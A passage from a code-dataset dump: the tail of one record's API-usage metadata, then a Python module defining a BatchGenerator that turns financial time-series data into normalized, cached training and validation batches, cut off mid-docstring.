"utilities.pyhocon.HOCONConverter.to_hocon", "line_number": 346, "usage_type": "call"}, {"api_name": "utilities.pyhocon.HOCONConverter", "line_number": 346, "usage_type": "name"}, {"api_name": "utilities.pyhocon.ConfigFactory.from_dict", "line_number": 346, "usage_type": "call"}, {"api_name": "utilities.pyhocon.ConfigFactory", "line_number": 346, "usage_type": "name"}, {"api_name": "json.dumps", "line_number": 351, "usage_type": "call"}, {"api_name": "utilities.pyhocon.HOCONConverter.to_hocon", "line_number": 352, "usage_type": "call"}, {"api_name": "utilities.pyhocon.HOCONConverter", "line_number": 352, "usage_type": "name"}, {"api_name": "utilities.pyhocon.ConfigFactory.parse_string", "line_number": 352, "usage_type": "call"}, {"api_name": "utilities.pyhocon.ConfigFactory", "line_number": 352, "usage_type": "name"}, {"api_name": "six.string_types", "line_number": 360, "usage_type": "attribute"}, {"api_name": "utilities.pyhocon.ConfigFactory.parse_string", "line_number": 363, "usage_type": "call"}, {"api_name": "utilities.pyhocon.ConfigFactory", "line_number": 363, "usage_type": "name"}, {"api_name": "pyparsing.ParseBaseException", "line_number": 364, "usage_type": "attribute"}, {"api_name": "six.raise_from", "line_number": 366, "usage_type": "call"}, {"api_name": "six.raise_from", "line_number": 368, "usage_type": "call"}, {"api_name": "backend_interface.util.mutually_exclusive", "line_number": 372, "usage_type": "call"}, {"api_name": "six.add_metaclass", "line_number": 102, "usage_type": "call"}, {"api_name": "abc.ABCMeta", "line_number": 102, "usage_type": "attribute"}, {"api_name": "backend_interface.model.Model", "line_number": 423, "usage_type": "call"}, {"api_name": "config.get_cache_dir", "line_number": 425, "usage_type": "call"}, {"api_name": "backend_interface.model.Model._EMPTY_MODEL_ID", "line_number": 441, "usage_type": "attribute"}, {"api_name": "backend_interface.model.Model", "line_number": 441, "usage_type": "name"}, {"api_name": "storage.helper.StorageHelper.conform_url", "line_number": 525, "usage_type": "call"}, {"api_name": "storage.helper.StorageHelper", "line_number": 525, "usage_type": "name"}, {"api_name": "backend_api.Session.check_min_api_version", "line_number": 529, "usage_type": "call"}, {"api_name": "backend_api.Session", "line_number": 529, "usage_type": "name"}, {"api_name": "backend_interface.model.Model._get_default_session", "line_number": 530, "usage_type": "call"}, {"api_name": "backend_interface.model.Model", "line_number": 530, "usage_type": "name"}, {"api_name": "backend_api.services.models.GetAllRequest", "line_number": 530, "usage_type": "call"}, {"api_name": "backend_api.services.models", "line_number": 530, "usage_type": "name"}, {"api_name": "debugging.log.get_logger", "line_number": 537, "usage_type": "call"}, {"api_name": "backend_interface.util.get_single_result", "line_number": 541, "usage_type": "call"}, {"api_name": "backend_interface.model.Model", "line_number": 553, "usage_type": "call"}, {"api_name": "config.get_cache_dir", "line_number": 555, "usage_type": "call"}, {"api_name": "task.Task.current_task", "line_number": 559, "usage_type": "call"}, {"api_name": "task.Task", "line_number": 559, "usage_type": "name"}, {"api_name": "task.id", "line_number": 561, "usage_type": "attribute"}, {"api_name": "task.project", "line_number": 562, "usage_type": "attribute"}, {"api_name": "task.id", "line_number": 563, "usage_type": "attribute"}, {"api_name": "{'Task': 'task.Task'}", "line_number": 586, "usage_type": "call"}, {"api_name": 
"storage.helper.StorageHelper.conform_url", "line_number": 613, "usage_type": "call"}, {"api_name": "storage.helper.StorageHelper", "line_number": 613, "usage_type": "name"}, {"api_name": "backend_api.Session.check_min_api_version", "line_number": 618, "usage_type": "call"}, {"api_name": "backend_api.Session", "line_number": 618, "usage_type": "name"}, {"api_name": "backend_interface.model.Model._get_default_session", "line_number": 622, "usage_type": "call"}, {"api_name": "backend_interface.model.Model", "line_number": 622, "usage_type": "name"}, {"api_name": "backend_api.services.models.GetAllRequest", "line_number": 622, "usage_type": "call"}, {"api_name": "backend_api.services.models", "line_number": 622, "usage_type": "name"}, {"api_name": "debugging.log.get_logger", "line_number": 631, "usage_type": "call"}, {"api_name": "backend_interface.util.get_single_result", "line_number": 632, "usage_type": "call"}, {"api_name": "{'Task': 'task.Task'}", "line_number": 640, "usage_type": "call"}, {"api_name": "{'Task': 'task.Task'}", "line_number": 667, "usage_type": "call"}, {"api_name": "backend_interface.model.Model", "line_number": 668, "usage_type": "call"}, {"api_name": "backend_interface.model.Model._wrap_design", "line_number": 673, "usage_type": "call"}, {"api_name": "backend_interface.model.Model", "line_number": 673, "usage_type": "name"}, {"api_name": "config.running_remotely", "line_number": 712, "usage_type": "call"}, {"api_name": "task.input_model", "line_number": 712, "usage_type": "attribute"}, {"api_name": "task.is_main_task", "line_number": 712, "usage_type": "call"}, {"api_name": "task.input_model", "line_number": 713, "usage_type": "attribute"}, {"api_name": "task.input_model", "line_number": 714, "usage_type": "attribute"}, {"api_name": "task.set_input_model", "line_number": 720, "usage_type": "call"}, {"api_name": "task._set_model_config", "line_number": 723, "usage_type": "call"}, {"api_name": "task.set_model_label_enumeration", "line_number": 725, "usage_type": "call"}, {"api_name": "backend_interface.model.Model._unwrap_design", "line_number": 773, "usage_type": "call"}, {"api_name": "backend_interface.model.Model", "line_number": 773, "usage_type": "name"}, {"api_name": "task.Task.current_task", "line_number": 895, "usage_type": "call"}, {"api_name": "task.Task", "line_number": 895, "usage_type": "name"}, {"api_name": "backend_interface.model.create_dummy_model", "line_number": 905, "usage_type": "call"}, {"api_name": "backend_interface.model.Model._wrap_design", "line_number": 906, "usage_type": "call"}, {"api_name": "backend_interface.model.Model", "line_number": 906, "usage_type": "name"}, {"api_name": "task.get_labels_enumeration", "line_number": 907, "usage_type": "call"}, {"api_name": "task.id", "line_number": 910, "usage_type": "attribute"}, {"api_name": "task.output_uri", "line_number": 913, "usage_type": "attribute"}, {"api_name": "{'Task': 'task.Task'}", "line_number": 917, "usage_type": "call"}, {"api_name": "task.name", "line_number": 923, "usage_type": "attribute"}, {"api_name": "config.running_remotely", "line_number": 952, "usage_type": "call"}, {"api_name": "task.is_main_task", "line_number": 952, "usage_type": "call"}, {"api_name": "backend_interface.model.Model._wrap_design", "line_number": 954, "usage_type": "call"}, {"api_name": "backend_interface.model.Model", "line_number": 954, "usage_type": "name"}, {"api_name": "backend_interface.model.Model._wrap_design", "line_number": 959, "usage_type": "call"}, {"api_name": "backend_interface.model.Model", 
"line_number": 959, "usage_type": "name"}, {"api_name": "backend_interface.model.Model._unwrap_design", "line_number": 965, "usage_type": "call"}, {"api_name": "backend_interface.model.Model", "line_number": 965, "usage_type": "name"}, {"api_name": "task._get_model_config_text", "line_number": 966, "usage_type": "call"}, {"api_name": "task._set_model_config", "line_number": 967, "usage_type": "call"}, {"api_name": "backend_interface.model.Model._wrap_design", "line_number": 969, "usage_type": "call"}, {"api_name": "backend_interface.model.Model", "line_number": 969, "usage_type": "name"}, {"api_name": "task.set_model_label_enumeration", "line_number": 972, "usage_type": "call"}, {"api_name": "storage.helper", "line_number": 1009, "usage_type": "name"}, {"api_name": "storage.helper.StorageHelper.get", "line_number": 1009, "usage_type": "call"}, {"api_name": "storage.helper.StorageHelper", "line_number": 1009, "usage_type": "name"}, {"api_name": "storage.helper.verify_upload", "line_number": 1013, "usage_type": "call"}, {"api_name": "storage.helper", "line_number": 1013, "usage_type": "name"}, {"api_name": "os.remove", "line_number": 1063, "usage_type": "call"}, {"api_name": "pathlib2.Path", "line_number": 1100, "usage_type": "call"}, {"api_name": "storage.helper.StorageHelper.conform_url", "line_number": 1141, "usage_type": "call"}, {"api_name": "storage.helper.StorageHelper", "line_number": 1141, "usage_type": "name"}, {"api_name": "six.text_type", "line_number": 1192, "usage_type": "attribute"}, {"api_name": "pathlib2.Path", "line_number": 1192, "usage_type": "call"}, {"api_name": "tempfile.mkstemp", "line_number": 1195, "usage_type": "call"}, {"api_name": "zipfile.ZipFile", "line_number": 1197, "usage_type": "call"}, {"api_name": "zipfile.ZIP_STORED", "line_number": 1197, "usage_type": "attribute"}, {"api_name": "pathlib2.Path", "line_number": 1199, "usage_type": "call"}, {"api_name": "os.close", "line_number": 1201, "usage_type": "call"}, {"api_name": "os.rmdir", "line_number": 1207, "usage_type": "attribute"}, {"api_name": "os.remove", "line_number": 1207, "usage_type": "attribute"}, {"api_name": "backend_interface.model.Model._wrap_design", "line_number": 1265, "usage_type": "call"}, {"api_name": "backend_interface.model.Model", "line_number": 1265, "usage_type": "name"}, {"api_name": "backend_interface.util.validate_dict", "line_number": 1289, "usage_type": "call"}, {"api_name": "six.string_types", "line_number": 1289, "usage_type": "attribute"}, {"api_name": "six.integer_types", "line_number": 1289, "usage_type": "attribute"}, {"api_name": "backend_interface.model.Model.wait_for_results", "line_number": 1317, "usage_type": "call"}, {"api_name": "backend_interface.model.Model", "line_number": 1317, "usage_type": "name"}]} +{"seq_id": "185235307", "text": "# Copyright 2016 Euclidean Technologies Management LLC All Rights Reserved.\n#\n# Licensed under the Apache License, Version 2.0 (the \"License\");\n# you may not use this file except in compliance with the License.\n# You may obtain a copy of the License at\n#\n# http://www.apache.org/licenses/LICENSE-2.0\n#\n# Unless required by applicable law or agreed to in writing, software\n# distributed under the License is distributed on an \"AS IS\" BASIS,\n# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.\n# See the License for the specific language governing permissions and\n# limitations under the License.\n# ==============================================================================\n\nimport os\nimport 
time\nimport sys\nimport random\nimport pickle\nimport hashlib\n\nimport numpy as np\nimport pandas as pd\nimport sklearn.preprocessing\nfrom sklearn.preprocessing import LabelEncoder, OneHotEncoder\n\n_MIN_SEQ_NORM = 1.0\nDEEP_QUANT_ROOT = os.environ['DEEP_QUANT_ROOT']\nDATASETS_PATH = os.path.join(DEEP_QUANT_ROOT, 'datasets')\n\n\ndef np_array_index(arr, value):\n \"\"\"\n Replicates the Python list's `index` method (that is, it returns\n the first appearance of `value` in the array).\n \n Raises `ValueError` if `value` is not present in `arr`.\n \"\"\"\n index = None\n for i, element in enumerate(arr):\n if element == value:\n index = i\n break\n\n if index is None:\n raise ValueError(\"{} is not in arr.\".format(value))\n\n return index\n\nclass BatchGenerator(object):\n \"\"\"\n A `BatchGenerator` object has a `next_batch` method that yields a batch of\n data sequences from the datafile whose shape is specified by\n `config.batch_size` and config.max_unrollings.\n \n A `BatchGenerator` can be initiated either by reading data from a .dat file\n or by passing the data explicitly, as a Pandas DataFrame.\n \"\"\"\n def __init__(self, datpath, config, validation=True, require_targets=True,\n data=None, verbose=True):\n \"\"\"Initalizes a `BatchGenerator`.\n\n Unless passed to the constructor explicitly using the `data` parameter\n (must be passed as a Pandas DataFrame), data is loaded as a Pandas\n DataFrame (from the .dat file at datpath) and stored in the `_data`\n attribute.\n\n Sequences of length `config.max_unrollings` are identified; the start\n and end indices of these sequences are stored in the `_start_indices`\n and `_end_indices` attributes of our `BatchGenerator` object,\n respectively. (These are both lists of equal length that indicate the\n indices of the start and of the end of every sequence that can be made\n from data stored in the `_data` DataFrame.)\n\n Indices are set up to access `config.batch_size` of these sequences as a\n batch; these are set up in such way that these sequences are \"far apart\"\n from each other in `_data` (more specifically, they're `_num_batches`\n spots away from each other in `_starat_indices` and `_end_indices`).\n This way it's unlikely that more than one sequence corresponds to the\n same company in a batch.\n\n This constructor also sets up an `_index_cursor` attribute and a\n `_batch_cursor` attribute. The former is a Python list that contains\n `config.batch_size` integers; each of these indexes a sequence of\n timestamps to be used in modeling (these sequences are fully determined\n by the corresponding values in `_start_indices` and `end_indices`). As\n each batch is consumed, this list is updated to point at a different\n group of sequences. The `_batch_cursor` is used to keep track of which\n of the `_num_batches` we're looking at.\n\n Args:\n datapath: A string that specifies the full path to a .dat file.\n config: A ConfigValues object (see configs.py). This is the\n interface that allows the user to pass settings necessary for\n building a BatchGenerator (such as which pieces of data to use\n in for making predictions, what to predict, what to scale by,\n how to scale, how many observations a Batch should have, etc.);\n these configurations are either specified at the command line\n when running deep_quant.py or set in a .conf file (within the\n `config` directory), and specified at the command line.\n validation: A boolean. Specifies whether a set of tickers should be\n randomly picked and set aside for validation or not. 
(Note that\n if this is set to True, one can then call the `valid_batches`\n method and obtain a new `BatchGenerator` object with the\n validation set as batches. (True by default)\n require_targets: A boolean. (True by default)\n data: A Pandas DataFrame from which to generate batches. (None by\n default)\n verbose: A boolean. (True by default)\n \"\"\"\n def init_data_attribute(self, datpath, config, data):\n \"\"\"Initializes `_data`, `_aux_colixs`, and `_data_len`\n\n Reads .dat file at `datpath` unless a Pandas DataFrame is passed as\n `data`. Gets rid of excess timesteps if necessary.\n \n If a .dat file was read and any categorical covariates are present\n (as specified by `config.categorical_fields`), these are encoded\n into their corresponding one-hot representation (as specified by its\n `field-encoding.dat` file); this one-hot representation is appended\n to the right of the `_data` attribute.\n \n Initializes the `_aux_colixs` attribute as a list. (If any encoding\n of categorical covariates takes place, this list is populated with\n the column indices of the columns that hold the one-hot\n representation of these.)\n \"\"\"\n def encode_cat_attrib(data, cat_attrib):\n \"\"\"\n Gets one-hot representation of the categorical attribute under\n `cat_attrib` column of the `data` DataFrame, appends that at\n right-end of `data`, returns the updated `data` DataFrame, and a\n list that contains the column indices of the columns that hold\n the one-hot representation of `cat_attrib`.\n \"\"\"\n # Load encoding file as Pandas DataFrame\n encoding_file = \"{}-encoding.dat\".format(cat_attrib.lower())\n encoding_path = os.path.join(DATASETS_PATH, encoding_file)\n encoding_df = pd.read_csv(encoding_path, sep=' ')\n\n # Get categories under `cat_attrib` column as Numpy array of\n # codes (these codes are integers as specified in encoding file)\n cat_enc = LabelEncoder()\n cat_enc.fit(encoding_df[cat_attrib].values)\n categories = data[cat_attrib].values\n codes = cat_enc.transform(categories).reshape(-1, 1)\n\n # Get one-hot representation of each example's `cat_attrib`\n onehot_enc = OneHotEncoder(n_values=len(cat_enc.classes_))\n onehot_enc.fit(encoding_df['code'].values.reshape(-1, 1))\n onehot_vecs = onehot_enc.transform(codes).toarray()\n onehot_colnames = ['is_' + lev for lev in cat_enc.classes_]\n\n # Write all one-hot columns on the right side\n _, m = data.shape\n codes_df = pd.DataFrame(onehot_vecs,columns=onehot_colnames)\n data = pd.concat([data, codes_df], axis=1)\n\n # Store the column indices\n onehot_colixs = list(range(m, m + onehot_enc.n_values))\n \n return data, onehot_colixs\n\n cat_fields = config.categorical_fields\n cat_attribs = cat_fields.split(',') \\\n if cat_fields is not None else []\n\n self._aux_colixs = list()\n onehot_colixs = list()\n # Load data if necessary\n if data is None:\n data = pd.read_csv(datpath, sep=' ',\n dtype={config.key_field: str})\n # Encode categorical covariates\n for cat_attrib in cat_attribs:\n data, onehot_colixs = encode_cat_attrib(data, cat_attrib)\n else:\n # Simply get the column indices of the one-hot columns\n for cat_attrib in cat_attribs:\n onehot_colixs = [i for i, col \\\n in enumerate(data.columns.values) \\\n if col.startswith('is_')]\n \n self._aux_colixs += onehot_colixs\n\n # Get rid of excess dates\n data = data.drop(data[data['date'] < config.start_date].index)\n data = data.drop(data[data['date'] > config.end_date].index)\n\n # Store attributes\n self._data = data\n self._data_len = len(data)\n assert 
self._data_len\n\n return\n\n def init_column_indices(self, config):\n \"\"\"Initializes `_fin_colixs`, `_fin_inputs`, and `aux_inputs`.\n\n Sets up column-index-related attributes and adds a few items to the\n config.\n\n Column-index-related attributes:\n * `_fin_colixs`: A list housing the column numbers of the \n features, where features are as specified by\n config.financial_fields.\n * `_aux_colixs`: A list housing the column numbers of the auxilary\n covariates, where these auxilary covariates are specified by\n config.aux_fields.\n * `_input_names`: A list housing the names of the columns of the\n features _and_ of the auxilary covariates.\n * `_num_inputs`: The total number of covariates used as input (so \n those that are specified in config.financial_fields, those\n that are specified in config.aux_fields, and those specified\n in config.categorical_fields).\n * `_key_idx`: The column index of what should be used as a unique\n identifier of each company (the index of gvkey, for example).\n * `_active_idx`: The column index of the field that lets us know\n whether a company was actively trading during a specific point\n in time or not.\n * `_date_idx`: The column index of the date field.\n\n Items added to the config:\n * `num_inputs`: same as the _num_inputs attribute\n * `num_ouptus`: num_inputs minus the number of aux covariates.\n * `target_idx`: index of target variable within the list of\n features, if target is specified by config.\n \"\"\"\n def get_colixs_from_colname_range(data, colname_range):\n \"\"\"\n Returns indexes of columns of `data` that are in the range of\n `colname_range`, inclusive. `colname_range` should be a string\n with the following format: start_column_name-end_column_name\n (saleq_ttm-ltq_mrq, for example).\n \"\"\"\n if colname_range is None:\n colixs = []\n else:\n assert 0 < colname_range.find('-') < len(colname_range)-1\n first, last = colname_range.split('-')\n start_ix = list(data.columns.values).index(first)\n end_ix = list(data.columns.values).index(last)\n assert start_ix >= 0\n assert start_ix <= end_ix\n colixs = list(range(start_ix, end_ix+1))\n return colixs\n \n assert config.financial_fields\n # Set up financials column indices and auxiliaries column indices\n self._fin_colixs = get_colixs_from_colname_range(\n self._data, config.financial_fields)\n\n self._aux_colixs += get_colixs_from_colname_range(\n self._data, config.aux_fields)\n\n # Set up other attributes\n colnames = self._data.columns.values\n self._key_idx = np_array_index(colnames, config.key_field)\n self._keys = self._data[config.key_field].tolist()\n self._date_idx = np_array_index(colnames, 'date') # TODO: make a config\n self._dates = self._data['date'].tolist()\n self._active_idx = np_array_index(colnames, config.active_field)\n self._normalizer_idx = np_array_index(colnames, config.scale_field)\n\n # Set up input-related attributes\n self._input_names = list(colnames[self._fin_colixs\\\n + self._aux_colixs])\n self._num_inputs = config.num_inputs = len(self._input_names)\n\n # Set up target index\n idx = np_array_index(colnames, config.target_field)\n if config.target_field == 'target':\n config.target_idx = 0\n self._num_outputs = config.num_outputs = 1\n self._price_target_idx = idx\n else:\n config.target_idx = idx - self._fin_colixs[0]\n self._num_outputs = config.num_outputs = self._num_inputs \\\n - len(self._aux_colixs)\n self._price_target_idx = -1\n\n assert(config.target_idx >= 0)\n\n # Set up fin_inputs attribute and aux_inputs attribute\n self._fin_inputs 
= self._data.iloc[:, self._fin_colixs].as_matrix()\n self._aux_inputs = self._data.iloc[:, self._aux_colixs].as_matrix()\n\n def init_validation_set(self, config, validation, verbose=True):\n \"\"\"Sets up validation set, if necessary. \n\n Creates the _validation_set attribute, which is a set housing the\n keys (unique identifier, such as gvkey) of the companies that should\n be used for validation.\n \"\"\"\n # Setup the validation data\n self._validation_set = set()\n\n if validation is True:\n if config.seed is not None:\n if verbose is True:\n print(\"\\nSetting random seed to \" + str(config.seed))\n random.seed(config.seed)\n np.random.seed(config.seed)\n\n # get number of keys\n keys = sorted(set(self._data[config.key_field]))\n sample_size = int(config.validation_size * len(keys))\n sample = random.sample(keys, sample_size)\n self._validation_set = set(sample)\n\n if verbose is True:\n print(\"Num training entities: %d\"%(len(keys) - sample_size))\n print(\"Num validation entities: %d\"%sample_size)\n return\n\n def init_batch_cursor(self, config, require_targets=True, verbose=True):\n \"\"\"Sets up indexes into the sequences.\n\n First, identifies start and end points of sequences (stored as\n `_start_indices` and `_end_indices`).\n\n Then, sets up two cursors: \n (1) `_index_cursor`, which is a cursor of equally-spaced indices \n into the dataset. Here, each index points to a sequence (which\n can be determined fully using `_data`, `_start_indices`, and\n `_end_indices`). There will be config.batch_size indices in\n this list. \n (2) `_batch_cursor`, which keeps track of the batch that we're\n working with. (This is just an int that changes as we go\n through the dataset in batches, and loops around once we've\n consumed the entire dataset.)\n\n Note that the number of batches is dictated by the number of\n sequences available and the user-defined size of each batch (as\n specified in `config.batch_size`). (The number of sequences\n available in turn depends on the length of those sequences,\n `config.max_unrollings` as well as the size of the dataset).\n \n Here, an attribute called `_batch_cache` is also created. This is a\n Python list of size `config.num_batches` that will house the\n contents of each batch (as a `Batch` object) once they're cached. 
\n \n Lastly, an attribute called `_init_index_cursor` is also created.\n This is simply a copy of `_index_cursor` in its original state,\n which will allow us to go back to the start if we need to once\n `_index_cursor` has changed.\n \"\"\"\n def store_sequence_start_end_indices(self, data, stride, \n forecast_n, min_steps, max_steps, require_targets, config):\n \"\"\"\n Populates the `_start_indices` and `_end_indices` attributes\n with the start and end index of each possible sequence in\n `data`.\n \"\"\"\n start_date = config.start_date if config.start_date is not None\\\n else 100001\n last_key = \"\"\n cur_length = 1\n\n for i in range(self._data_len):\n key = data.iat[i, self._key_idx]\n if i+forecast_n < len(data):\n pred_key = data.iat[i+forecast_n, self._key_idx]\n else:\n pred_key = \"\"\n\n active = True if int(data.iat[i,self._active_idx]) else False\n date = data.iat[i,self._date_idx]\n\n if key != last_key:\n cur_length = 1\n\n if ((cur_length >= min_steps)\n and (active is True)\n and (date >= start_date)):\n # If targets are not required, we don't need the future\n # sequences to be there, otherwise we do\n seq_len = min(cur_length-(cur_length-1) % stride, \n max_steps)\n if (not require_targets) or (key == pred_key):\n self._start_indices.append(i-seq_len+1)\n self._end_indices.append(i)\n cur_length += 1\n last_key = key\n\n return \n\n self._start_indices = list()\n self._end_indices = list()\n \n min_steps = self._stride*(self._min_unrollings-1)+1\n max_steps = self._stride*(self._max_unrollings-1)+1\n store_sequence_start_end_indices(self, self._data, self._stride, \n self._forecast_n, min_steps, max_steps, require_targets, config)\n\n if verbose is True:\n print(\"Num. of sequences: %d\"%(len(self._start_indices)))\n\n # Create a cursor of equally spaced indices into the dataset. 
Each\n # index in the cursor points to one sequence in a batch and is used\n # to keep track of where we are in the dataset.\n self._num_batches = len(self._start_indices) // self._batch_size\n self._index_cursor = [offset*self._num_batches for offset in \\\n range(self._batch_size)]\n self._init_index_cursor = self._index_cursor[:]\n self._batch_cache = [None]*self._num_batches\n self._batch_cursor = 0\n\n # Store configs that'll later be used as attributes\n self._scaling_feature = config.scale_field\n self._scaling_params = None\n self._start_date = config.start_date\n self._end_date = config.end_date\n self._max_unrollings = config.max_unrollings\n self._min_unrollings = config.min_unrollings\n self._stride = config.stride\n self._forecast_n = config.forecast_n\n self._batch_size = config.batch_size\n\n assert self._stride >= 1\n \n # Initialize data\n init_data_attribute(self, datpath, config, data)\n init_column_indices(self, config)\n init_validation_set(self, config, validation, verbose)\n\n # Initialize cursors\n init_batch_cursor(self, config, require_targets, verbose)\n\n # Save config for the `train_batches` and the `valid_batches` method\n self._config = config\n\n def _get_normalizer(self, end_idx):\n val = max(self._data.iat[end_idx, self._normalizer_idx], \n _MIN_SEQ_NORM)\n return val\n\n def _get_batch_normalizers(self):\n \"\"\"\n Returns an np.array housing the normalizers (scalers) by which\n the inputs of the current sequence should be scaled (this is\n specified by config.scale_field).\n \"\"\"\n v_get_normalizer = np.vectorize(self._get_normalizer)\n end_idxs = np.array(self._end_indices)[self._index_cursor]\n return v_get_normalizer(end_idxs)\n\n def _get_feature_vector(self, end_idx, cur_idx):\n if cur_idx < self._data_len:\n s = self._get_normalizer(end_idx)\n assert(s>0)\n x = self._fin_inputs[cur_idx]\n y = np.divide(x,s)\n y_abs = np.absolute(y).astype(float)\n return np.multiply(np.sign(y),np.log1p(y_abs))\n else:\n return np.zeros(shape=[len(self._fin_colixs)])\n\n def _get_aux_vector(self,cur_idx):\n if cur_idx < self._data_len:\n x = self._aux_inputs[cur_idx]\n return x\n else:\n return np.zeros(shape=[len(self._aux_colixs)])\n\t\t\t\n def next_batch(self):\n \"\"\"Gets next batch as a Python list of `Batch` objects.\n\n Fetches next batch via the `_next_batch` method (if not already saved),\n saves batch onto the `_batch_cache` attribute list and also returns it.\n Also updates `_batch_cursor` to point to the following batch.\n \"\"\"\n def get_next_batch(self):\n \"\"\"\n Generate the next batch of sequences from the data.\n Returns:\n A batch of type Batch (see class def below)\n \"\"\"\n def get_step_for_batch(self, step, seq_lengths):\n \"\"\"\n Get step for entire batch.\n \"\"\"\n def get_step_for_seq(self, step, batch_seq_num):\n \"\"\"\n Get step for a particular sequence.\n \"\"\"\n seq_x = np.zeros(self._num_inputs)\n seq_y = np.zeros(self._num_outputs)\n stride = self._stride\n forecast_n = self._forecast_n\n len1 = len(self._fin_colixs)\n len2 = len(self._aux_colixs)\n \n # Get generally-relevant indices about the sequence\n global_seq_num = self._index_cursor[batch_seq_num]\n seq_start_idx = self._start_indices[global_seq_num]\n seq_end_idx = self._end_indices[global_seq_num]\n seq_lengths[batch_seq_num] = ((seq_end_idx-seq_start_idx)\\\n //stride)+1\n \n # Get indices particular to this step within the sequence\n seq_step_idx = seq_start_idx + step*stride\n assert(seq_step_idx < self._data_len)\n seq_step_date = self._dates[seq_step_idx]\n 
seq_step_key = self._keys[seq_step_idx]\n nextstep_idx = seq_step_idx + forecast_n\n if nextstep_idx < len(self._keys):\n next_key = self._keys[nextstep_idx]\n else:\n next_key = \"\"\n \n # Store that step-in-the-sequence's data onto x, y, and attr\n if seq_step_idx > seq_end_idx:\n seq_attr = None\n seq_x[:] = 0.0 # TODO: better way to impute this?\n seq_y[:] = 0.0 # TODO: better way to impute this?\n else:\n seq_attr = (seq_step_key, seq_step_date)\n seq_x[0:len1] = self._get_feature_vector(seq_end_idx,\n seq_step_idx)\n if len2 > 0:\n seq_x[len1:len1+len2] = self._get_aux_vector(\n seq_step_idx)\n \n if seq_step_key == next_key: # targets exist\n seq_y[:] = self._get_feature_vector(seq_end_idx,\n nextstep_idx)\n else: # no targets exist\n seq_y[:] = None\n \n return seq_x, seq_y, seq_attr\n \n # Initialize arrays and list to populate\n x = np.zeros(shape=(self._batch_size, self._num_inputs),\n dtype=np.float)\n y = np.zeros(shape=(self._batch_size, self._num_outputs),\n dtype=np.float)\n attr = list()\n \n # Populate arrays\n for batch_seq_num in range(self._batch_size):\n seq_x, seq_y, seq_attr = get_step_for_seq(self, \n step, batch_seq_num)\n x[batch_seq_num] = seq_x\n y[batch_seq_num] = seq_y\n attr.append(seq_attr)\n \n return x, y, attr\n \n normalizers = self._get_batch_normalizers()\n seq_lengths = np.array([self._max_unrollings]*self._batch_size)\n \n inputs = list()\n targets = list()\n attribs = list()\n for step in range(self._max_unrollings):\n x, y, attr = get_step_for_batch(self, step, seq_lengths)\n inputs.append(x)\n targets.append(y)\n attribs.append(attr)\n \n assert len(inputs) == len(targets)\n \n # Set cursor for next batch\n batch_size = self._batch_size\n num_idxs = len(self._start_indices)\n self._index_cursor = [(self._index_cursor[b]+1) % num_idxs \\\n for b in range(batch_size)]\n \n return Batch(inputs, targets, attribs, normalizers, seq_lengths)\n\n b = None\n # Get batch\n if self._batch_cache[self._batch_cursor] is not None:\n # if it's already cached then just get it from `_batch_cache` list\n b = self._batch_cache[self._batch_cursor]\n else:\n # otherwise get it and cache it onto `_batch_cache` list\n b = get_next_batch(self)\n self._batch_cache[self._batch_cursor] = b\n\n # Update `_batch_cursor` to point to next batch (wrap around if needed)\n self._batch_cursor = (self._batch_cursor+1) % (self._num_batches)\n\n return b\n\n def cache(self, verbose=False):\n \"\"\"Caches data if not already cached.\n\n Does so by either reading cache from a pickled file in the _bcache\n directory, or by loading the cache (via the `load_cache` local function,\n which in turn relies on the `next_batch` global function), and\n subsequently writing that to the `_bcache` directory as a pickled file\n for posterity.\n \"\"\"\n def get_cache_filename(self):\n key_list = sorted(set(self._data[self._config.key_field]))\n keys = ''.join(key_list)\n sd = self._start_date if self._start_date is not None else 100001\n ed = self._end_date if self._end_date is not None else 999912\n uid = \"%d-%d-%d-%d-%d-%d-%d-%s-%s-%s\" % (\n self._config.cache_id, sd, ed,\n self._max_unrollings,\n self._min_unrollings,\n self._stride,\n self._batch_size,\n self._config.financial_fields,\n self._config.aux_fields,\n keys)\n\n hashed = hashlib.md5(uid.encode()).hexdigest()\n filename = \"bcache-%s.pkl\" % hashed\n return filename\n\n def read_cache_from_pickle(self, filepath, verbose):\n start_time = time.time()\n if verbose is True:\n print(\"Reading cache from %s ...\" % filepath, end=' ')\n 
self._batch_cache = pickle.load(open(filepath, \"rb\"))\n self._num_batches = len(self._batch_cache) # TODO: remove line?\n if verbose is True:\n print(\"done in %.2f seconds.\"%(time.time() - start_time))\n return\n\n def load_cache(self, verbose):\n \"\"\"\n Caches batches from `self` by calling the `next_batch` method\n (which writes batch to the list held by the `_batch_cache`\n attribute).\n \"\"\"\n start_time = time.time()\n if verbose is True:\n print(\"\\nCaching batches...\", end=' '); sys.stdout.flush()\n\n self.rewind()\n for _ in range(self._num_batches):\n b = self.next_batch()\n\n if verbose is True:\n print(\"done in %.2f seconds.\" % (time.time() - start_time))\n\n def write_cache_to_pickle_at_filepath(self, filepath, verbose):\n start_time = time.time()\n if verbose is True:\n print(\"Writing cache to %s ...\"%filepath, end=' ')\n pickle.dump(self._batch_cache, open(filepath, \"wb\"))\n if verbose is True:\n print(\"done in %.2f seconds.\"%(time.time() - start_time))\n\n assert len(self._batch_cache)\n if all(self._batch_cache):\n # data already cached\n pass\n else:\n # cache is (at least partially) empty (not all data already cached)\n if self._config.cache_id is not None:\n # cache WILL be read from pickle or loaded and saved onto pickle\n filename = get_cache_filename(self)\n dirname = '_bcache'\n filepath = os.path.join(dirname, filename)\n\n if not os.path.isdir(dirname):\n os.makedirs(dirname)\n\n if os.path.isfile(filepath):\n # read cache if already been loaded and pickled\n read_cache_from_pickle(self, filepath, verbose)\n else:\n # otherwise load it and pickle it for posterity\n load_cache(self, verbose)\n write_cache_to_pickle_at_filepath(self, filepath, verbose)\n else:\n # cache WILL NOT be read from pickle or saved as pickle\n load_cache(self, verbose)\n return\n\n def train_batches(self):\n \"\"\"\n Returns a BatchGenerator object built from the subset of self._data that\n corresponds to the 'keys' (uniquely-identified companies) that are _not_\n in the validation set.\n \"\"\"\n valid_keys = list(self._validation_set)\n valid_rows = self._data[self._config.key_field].isin(valid_keys)\n train_data = self._data[~valid_rows]\n return BatchGenerator(\"\", self._config, validation=False,\n data=train_data)\n\n def valid_batches(self):\n \"\"\"\n Returns a BatchGenerator object built from the subset of self._data that\n corresponds to the 'keys' (uniquely-identified companies) that _are_ in\n the validation set.\n \"\"\"\n valid_keys = list(self._validation_set)\n valid_rows = self._data[self._config.key_field].isin(valid_keys)\n valid_data = self._data[valid_rows]\n return BatchGenerator(\"\", self._config, validation=False,\n data=valid_data)\n\n def shuffle(self):\n if all(self._batch_cache):\n # We cannot shuffle until the entire dataset is 